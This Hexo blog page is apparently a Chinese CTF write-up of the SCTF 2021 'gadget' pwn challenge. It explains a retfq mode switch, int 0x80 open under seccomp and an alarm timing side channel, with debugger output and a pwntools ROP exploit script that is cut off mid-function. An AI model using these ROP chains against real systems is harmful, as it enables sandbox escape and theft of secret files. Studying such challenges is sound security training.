<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="sctf2021 gadget知识点：64位程序转32位，三十二位使用int80调用open，alarm侧信道攻击 做过的最难的构造rop题目了，但学到了很多东西，用了快两天才复现成功，这道题能搜到的wp就两个，而且只有脚本，没有多少讲解，我是硬着头皮看脚本一步步动态调试才搞明白，所以这篇wp我会写的细一点，一方面有可能对其他人有用（几乎不可能），一方面加深我的理解。 64位程序转32位程序运行起">
<meta property="og:type" content="article">
<meta property="og:title" content="sctf2021 gadget">
<meta property="og:url" content="http://example.com/2022/01/20/sctf2021-gadget/index.html">
<meta property="og:site_name" content="study">
<meta property="og:description" content="sctf2021 gadget知识点：64位程序转32位，三十二位使用int80调用open，alarm侧信道攻击 做过的最难的构造rop题目了，但学到了很多东西，用了快两天才复现成功，这道题能搜到的wp就两个，而且只有脚本，没有多少讲解，我是硬着头皮看脚本一步步动态调试才搞明白，所以这篇wp我会写的细一点，一方面有可能对其他人有用（几乎不可能），一方面加深我的理解。 64位程序转32位程序运行起">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220119222532362.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220119231414100.png">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220119231430907.png">
<meta property="article:published_time" content="2022-01-20T10:32:48.000Z">
<meta property="article:modified_time" content="2022-01-20T10:37:19.008Z">
<meta property="article:author" content="rootzhang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220119222532362.png">

<link rel="canonical" href="http://example.com/2022/01/20/sctf2021-gadget/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sctf2021 gadget | study</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">study</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/01/20/sctf2021-gadget/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rootzhang">
      <meta itemprop="description" content="我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="study">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sctf2021 gadget
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-01-20 18:32:48 / 修改时间：18:37:19" itemprop="dateCreated datePublished" datetime="2022-01-20T18:32:48+08:00">2022-01-20</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="sctf2021-gadget"><a href="#sctf2021-gadget" class="headerlink" title="sctf2021 gadget"></a>sctf2021 gadget</h1><p>知识点：64位程序转32位，三十二位使用int80调用open，alarm侧信道攻击</p>
<p>做过的最难的构造rop题目了，但学到了很多东西，用了快两天才复现成功，这道题能搜到的wp就两个，而且只有脚本，没有多少讲解，我是硬着头皮看脚本一步步动态调试才搞明白，所以这篇wp我会写的细一点，一方面有可能对其他人有用（几乎不可能），一方面加深我的理解。</p>
<h2 id="64位程序转32位"><a href="#64位程序转32位" class="headerlink" title="64位程序转32位"></a>64位程序转32位</h2><p>程序运行起来时，专门有一个寄存器cs来决定到底是以64位运行还是以32位运行，当cs为0x33时，程序以64位运行，当cs是0x23时程序以32位运行，这个寄存器并不是不能更改的，专门有个指令retfq用来更改cs，最关键的是retfq还有跳转功能，那就代表组成攻击链。</p>
<p>retfq有三步操作（就结果而言），先设置cs为[rsp+0x8]，然后rsp+0x10,然后跳转到rsp-0x10,这样说可能有点抽象，我们可以用gadget来实操一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=p64(retfq)+p64(ret)+p64(<span class="number">0x23</span>)+p32(pop_rax)</span><br></pre></td></tr></table></figure>

<p>然后在这里下断点运行</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">───────────────────────────────────[ DISASM ]───────────────────────────────────</span><br><span class="line">   0x409d1c &lt;__futexwait+113&gt;    pop    rsp</span><br><span class="line">   0x409d1d &lt;__futexwait+114&gt;    mov    edi, 0x88bf2838</span><br><span class="line">   0x409d22 &lt;__futexwait+119&gt;    ret    </span><br><span class="line">    ↓</span><br><span class="line"> ► 0x4011ec &lt;main+28&gt;            retfq  </span><br><span class="line">    ↓</span><br><span class="line">   0x4011ec &lt;main+28&gt;            retfq  </span><br><span class="line">───────────────────────────────────[ STACK ]────────────────────────────────────</span><br><span class="line">00:0000│ rsp 0x40d010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0x401002 (_init+2) ◂— ret    </span><br><span class="line">01:0008│     0x40d018 ◂— 0x23 /* &#x27;#&#x27; */</span><br><span class="line">02:0010│     0x40d020 (__dso_handle) ◂— 0x500401001</span><br><span class="line">03:0018│     0x40d028 (__dso_handle+8) ◂— 0x40d00000403072 /* &#x27;r0@&#x27; */</span><br><span class="line">04:0020│     0x40d030 (install_seccomp.filter) ◂— 0x40d0000040d000</span><br><span class="line">05:0028│     0x40d038 (install_seccomp.filter+8) ◂— 0x40117b0040d000</span><br><span class="line">06:0030│     0x40d040 (install_seccomp.filter+16) ◂— 0x4011f300000000</span><br><span class="line">07:0038│     0x40d048 (install_seccomp.filter+24) ◂— 0x401002004011ec</span><br><span class="line">─────────────────────────────────[ BACKTRACE ]──────────────────────────────────</span><br></pre></td></tr></table></figure>

<p>这时要执行retfq时的指令区和栈区，执行完后就变成这样了。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> ► 0x401002 &lt;_init+2&gt;    ret    &lt;0x500401001&gt;</span><br><span class="line">───────────────────────────────────[ STACK ]────────────────────────────────────</span><br><span class="line">00:0000│ rsp 0x40d020 (__dso_handle) ◂— 0x500401001</span><br><span class="line">01:0008│     0x40d028 (__dso_handle+8) ◂— 0x40d00000403072 /* &#x27;r0@&#x27; */</span><br><span class="line">02:0010│     0x40d030 (install_seccomp.filter) ◂— 0x40d0000040d000</span><br><span class="line">03:0018│     0x40d038 (install_seccomp.filter+8) ◂— 0x40117b0040d000</span><br><span class="line">04:0020│     0x40d040 (install_seccomp.filter+16) ◂— 0x4011f300000000</span><br><span class="line">05:0028│     0x40d048 (install_seccomp.filter+24) ◂— 0x401002004011ec</span><br><span class="line">06:0030│     0x40d050 (install_seccomp.filter+32) ◂— 0x40100100000033 /* &#x27;3&#x27; */</span><br><span class="line">07:0038│     0x40d058 (install_seccomp.filter+40) ◂— 0x0</span><br><span class="line">─────────────────────────────────[ BACKTRACE ]─────────────────────────────────</span><br></pre></td></tr></table></figure>

<p>此时rsp已经加10，要执行的指令也是此时的rsp-0x10,即我们构造的ret,rsp也是我们构造的gadget的指令，这样攻击链就连上了（跳转功能）。</p>
<h2 id="三十二位使用int80调用open"><a href="#三十二位使用int80调用open" class="headerlink" title="三十二位使用int80调用open"></a>三十二位使用int80调用open</h2><p>64位系统调用open和32位系统调用open函数的寄存器布置并不相同，网上也没什么资料，搜了好久然后问了ayoung佬才搞懂。在64位系统调用时要布置rax,rdi,rsi,rbx四个参数，rax是系统调用号，后面三个是参数，在32位系统调用时是布置ecx,eax,ebx,edx,四个参数的作用如下图如下图，其中eax,ebx必须非常严谨，ecs和edx布不布置都行，但ecx为0会提高成功率（奇怪的知识），所以最好还是布置ecx。</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20220119222532362.png" alt="image-20220119222532362"></p>
<p>在32位程序中系统调用并不是syscall（而且并不存在），而是int80指令，选择gadget的时候最好选择int80;ret（如果后面还有rop要执行的话）,</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">int 80;ret</span><br></pre></td></tr></table></figure>

<h2 id="alarm侧信道攻击"><a href="#alarm侧信道攻击" class="headerlink" title="alarm侧信道攻击"></a>alarm侧信道攻击</h2><p>alarm函数是程序的一个计时函数，比如程序刚开始调用alarm(10)，那这个函数从这个时间点开始只能再执行十秒钟</p>
<p>利用思路：可以把flag的每个字符mov给rdi后调用alarm函数，从alarm函数开始执行的时候计时，然后检测程序的结束时间，结束时间减去开始时间就是rdi的值即flag的每个字符的值。</p>
<h4 id="重点：当执行完alarm函数后得让程序陷入死循环，不然执行完alarm函数就直接退出程序了，不能达到我们想要的目的，比如这个rop"><a href="#重点：当执行完alarm函数后得让程序陷入死循环，不然执行完alarm函数就直接退出程序了，不能达到我们想要的目的，比如这个rop" class="headerlink" title="重点：当执行完alarm函数后得让程序陷入死循环，不然执行完alarm函数就直接退出程序了，不能达到我们想要的目的，比如这个rop"></a>重点：当执行完alarm函数后得让程序陷入死循环，不然执行完alarm函数就直接退出程序了，不能达到我们想要的目的，比如这个rop</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=p64(alarm)+p64(<span class="number">0</span>)+p64(pop_rsi_r15_rbp)+p64(push_rsi_ret)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(push_rsi_ret)</span><br></pre></td></tr></table></figure>

<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p>checksec分析</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] &#x27;/home/rootzhang/get-shell/sctf2021/gadget/gadget&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>

<p>沙盒分析</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">rootzhang@ubuntu:~/get-shell/sctf2021/gadget$ seccomp-tools dump ./gadget</span><br><span class="line"> line  CODE  JT   JF      K</span><br><span class="line">=================================</span><br><span class="line"> 0000: 0x20 0x00 0x00 0x00000000  A = sys_number</span><br><span class="line"> 0001: 0x25 0x03 0x00 0x40000000  if (A &gt; 0x40000000) goto 0005</span><br><span class="line"> 0002: 0x15 0x03 0x00 0x00000005  if (A == fstat) goto 0006</span><br><span class="line"> 0003: 0x15 0x02 0x00 0x00000000  if (A == read) goto 0006</span><br><span class="line"> 0004: 0x15 0x01 0x00 0x00000025  if (A == alarm) goto 0006</span><br><span class="line"> 0005: 0x06 0x00 0x00 0x00000000  return KILL</span><br><span class="line"> 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>只允许调用fstat(32位下的open函数),read函数和alarm函数，从这里就可以看出做题思路了，先64位转三十二位调用open函数读flag，然后再转成64位调用read函数把flag写到程序里，然后alarm侧信道爆破</p>
<p>ida反汇编</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v3; <span class="comment">// rdx</span></span><br><span class="line">  __int64 v4; <span class="comment">// rcx</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// er8</span></span><br><span class="line">  <span class="keyword">int</span> v6; <span class="comment">// er9</span></span><br><span class="line">  <span class="keyword">char</span> v9[<span class="number">44</span>]; <span class="comment">// [rsp+10h] [rbp-30h] BYREF</span></span><br><span class="line">  <span class="keyword">int</span> v10; <span class="comment">// [rsp+3Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  v10 = <span class="number">0</span>;</span><br><span class="line">  alarm_sys(<span class="number">48LL</span>, argv, envp);</span><br><span class="line">  install_seccomp(<span class="number">48LL</span>, (__int64)argv, v3, v4, v5, v6);</span><br><span class="line">  read_sys(v9);</span><br><span class="line">  <span class="keyword">return</span> (<span class="keyword">int</span>)&amp;locret_401002;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">__int64 __fastcall <span class="title">read_sys</span><span class="params">(<span class="keyword">char</span> *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">return</span> (<span class="keyword">unsigned</span> <span class="keyword">int</span>)sys_read(<span class="number">0</span>, a1, <span class="number">0xC0</span>uLL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>程序非常简单没有canary还有溢出，那就直接溢出构造rop完成攻击思路，注意rop非常长所以得进行栈迁移才行。</p>
<p>第一步调用read函数把rop写到bss段然后栈迁移到这里</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x38</span>+p64(pop_rax)+p64(<span class="number">0</span>)+p64(pop_rdi_rbp)+p64(<span class="number">0</span>)+p64(bss_base)</span><br><span class="line">payload+=p64(pop_r12_r14_r15_rbp)+p64(<span class="number">0x300</span>)+p64(sys_read)+p64(bss_base)+p64(bss_base)</span><br><span class="line">payload+=p64(mov_rsi_rdx_call_r14)+p64(pop_rsp_mov_edi)+p64(bss_base+<span class="number">0x8</span>)</span><br></pre></td></tr></table></figure>

<p>第二步retfq后调用open函数读flag文件，然后再retfq后调用read函数把flag写到bss段，然后再调用read函数进栈迁移</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">&#x27;./flag\x00\x00&#x27;</span>+p64(retfq)+p64(ret)+p64(<span class="number">0x23</span>)</span><br><span class="line">payload+=p32(pop_rax)+p32(<span class="number">5</span>)+p32(pop_rbx_r14_r15_rbp)+p32(bss_base)*<span class="number">4</span></span><br><span class="line">payload+=p32(pop_rcx)+p32(<span class="number">0</span>)+p32(int80_ret)+p32(retfq)+p32(ret)</span><br><span class="line">payload+=p32(<span class="number">0x33</span>)+p64(pop_rax)+p64(<span class="number">0</span>)+p64(pop_rdi_rbp)+p64(<span class="number">3</span>)+p64(bss_base)</span><br><span class="line">payload+=p64(sys_ret)+p64(pop_rdi_rbp)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(pop_rsi_r15_rbp)</span><br><span class="line">   payload+=p64(bss_base+<span class="number">1</span>+num+)*<span class="number">2</span>+p64(bss_base+<span class="number">8</span>+num+)+p64(pop_rax)+p64(<span class="number">0</span>)+p64(sys_ret)+p64(pop_rsp_mov_edi)+p64(bss_base+<span class="number">8</span>+num+)</span><br><span class="line">paylaod=payload.ljust(<span class="number">0x300</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>第三步把alarm函数的rop写入bss段然后计时（注意不能在第二步就把alarm函数的rop就写入栈中，这样做的话我们就不能知道alarm函数到底是什么时候调用的，因为前面执行了好多代码了）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">&#x27;\x00\x00\x00\x00\x00\x00\x00&#x27;</span>+p64(alarm)+p64(<span class="number">0</span>)+p64(pop_rsi_r15_rbp)+p64(push_rsi_ret)+p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">   payload+=p64(push_rsi_ret)</span><br><span class="line">   sh.send(payload)</span><br><span class="line">   start=time.time()</span><br><span class="line">   <span class="keyword">try</span>:</span><br><span class="line">       sh.recv()</span><br><span class="line">   <span class="keyword">except</span>:</span><br><span class="line">       end=time.time()</span><br><span class="line">       asc=<span class="built_in">int</span>(end-start)</span><br><span class="line">       <span class="keyword">global</span> flag</span><br><span class="line">       flag+=<span class="built_in">chr</span>(asc)</span><br><span class="line">       <span class="built_in">print</span> flag</span><br></pre></td></tr></table></figure>

<p>完整脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">flag=<span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0x000000000040288d : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040172f : pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040288f : pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401731 : pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401733 : pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401001 : pop rax ; ret</span></span><br><span class="line"><span class="string">0x0000000000402890 : pop rbp ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401102 : pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040172e : pop rbx ; pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000403072 : pop rbx ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040117b : pop rcx ; ret</span></span><br><span class="line"><span class="string">0x0000000000401734 : pop rdi ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401732 : pop rsi ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040288e : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401730 : pop rsp ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401002 : ret</span></span><br><span class="line"><span class="string">0x0000000000402c04: mov rsi, r15; mov rdx, r12; call r14; mov edi, eax; call 0x1010; ret;</span></span><br><span class="line"><span class="string">x0000000000401102: pop rbp; ret;</span></span><br><span class="line"><span class="string">0x0000000000409d1c: pop rsp; mov edi, 0x88bf2838; ret;</span></span><br><span class="line"><span class="string">0x0000000000401001: pop rax; ret; </span></span><br><span class="line"><span class="string">0x00000000004011f3: int 0x80; ret;</span></span><br><span class="line"><span class="string">0x0000000000403072: pop rbx; pop r14; pop r15; pop rbp; ret;</span></span><br><span class="line"><span class="string">0x000000000040117b: pop rcx; ret;</span></span><br><span class="line"><span class="string">0x0000000000408865: syscall; ret;</span></span><br><span class="line"><span class="string">0x0000000000401732: pop rsi; pop r15; pop rbp; ret;</span></span><br><span class="line"><span class="string">0x00000000004011c5 : push rsi ; ret</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">push_rsi_ret=<span class="number">0x00000000004011c5</span></span><br><span class="line">alarm = <span class="number">0x40115D</span></span><br><span class="line">sys_ret=<span class="number">0x0000000000408865</span></span><br><span class="line">pop_rcx=<span class="number">0x000000000040117b</span></span><br><span class="line">pop_rbx_r14_r15_rbp=<span class="number">0x0000000000403072</span></span><br><span class="line">int80_ret=<span class="number">0x00000000004011f3</span></span><br><span class="line">retfq = <span class="number">0x4011ec</span></span><br><span class="line">bss_base=<span class="number">0x40c000</span>+<span class="number">0x1000</span></span><br><span class="line">pop_rax=<span class="number">0x0000000000401001</span></span><br><span class="line">pop_rdi_rbp=<span class="number">0x0000000000401734</span></span><br><span class="line">pop_rsi_r15_rbp=<span class="number">0x0000000000401732</span></span><br><span class="line">pop_rbp=<span class="number">0x0000000000401102</span></span><br><span class="line">sys_read=<span class="number">0x40119A</span></span><br><span class="line">pop_r12_r14_r15_rbp=<span class="number">0x000000000040172f</span></span><br><span class="line">mov_rsi_rdx_call_r14=<span class="number">0x0000000000402c04</span></span><br><span class="line">pop_rsp_mov_edi=<span class="number">0x0000000000409d1c</span></span><br><span class="line">ret=<span class="number">0x0000000000401002</span></span><br><span class="line">pop_rax=<span class="number">0x0000000000401001</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span>(<span class="params">num</span>):</span></span><br><span class="line">    sh=process(<span class="string">&#x27;./gadget&#x27;</span>)</span><br><span class="line">    gdb.attach(sh,<span class="string">&quot;b *0x0000000000409d1c&quot;</span>)</span><br><span class="line">    <span class="comment">#part1 stack&amp;read</span></span><br><span class="line">    payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x38</span>+p64(pop_rax)+p64(<span class="number">0</span>)+p64(pop_rdi_rbp)+p64(<span class="number">0</span>)+p64(bss_base)</span><br><span class="line">    payload+=p64(pop_r12_r14_r15_rbp)+p64(<span class="number">0x300</span>)+p64(sys_read)+p64(bss_base)+p64(bss_base)</span><br><span class="line">    payload+=p64(mov_rsi_rdx_call_r14)+p64(pop_rsp_mov_edi)+p64(bss_base+<span class="number">0x8</span>)</span><br><span class="line">    sh.send(payload)</span><br><span class="line">    sleep(<span class="number">1</span>)</span><br><span class="line">    <span class="comment">#part2 retf&amp;open&amp;read</span></span><br><span class="line">    payload=<span class="string">&#x27;./flag\x00\x00&#x27;</span>+p64(retfq)+p64(ret)+p64(<span class="number">0x23</span>)</span><br><span class="line">    payload+=p32(pop_rax)+p32(<span class="number">5</span>)+p32(pop_rbx_r14_r15_rbp)+p32(bss_base)*<span class="number">4</span></span><br><span class="line">    payload+=p32(pop_rcx)+p32(<span class="number">0</span>)+p32(int80_ret)+p32(retfq)+p32(ret)</span><br><span class="line">    payload+=p32(<span class="number">0x33</span>)+p64(pop_rax)+p64(<span class="number">0</span>)+p64(pop_rdi_rbp)+p64(<span class="number">3</span>)+p64(bss_base)</span><br><span class="line">    payload+=p64(sys_ret)+p64(pop_rdi_rbp)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(pop_rsi_r15_rbp)</span><br><span class="line">    payload+=p64(bss_base+<span class="number">1</span>+num)*<span class="number">2</span>+p64(bss_base+<span class="number">8</span>+num)+p64(pop_rax)+p64(<span class="number">0</span>)+p64(sys_ret)+p64(pop_rsp_mov_edi)+p64(bss_base+<span class="number">8</span>+num)</span><br><span class="line">    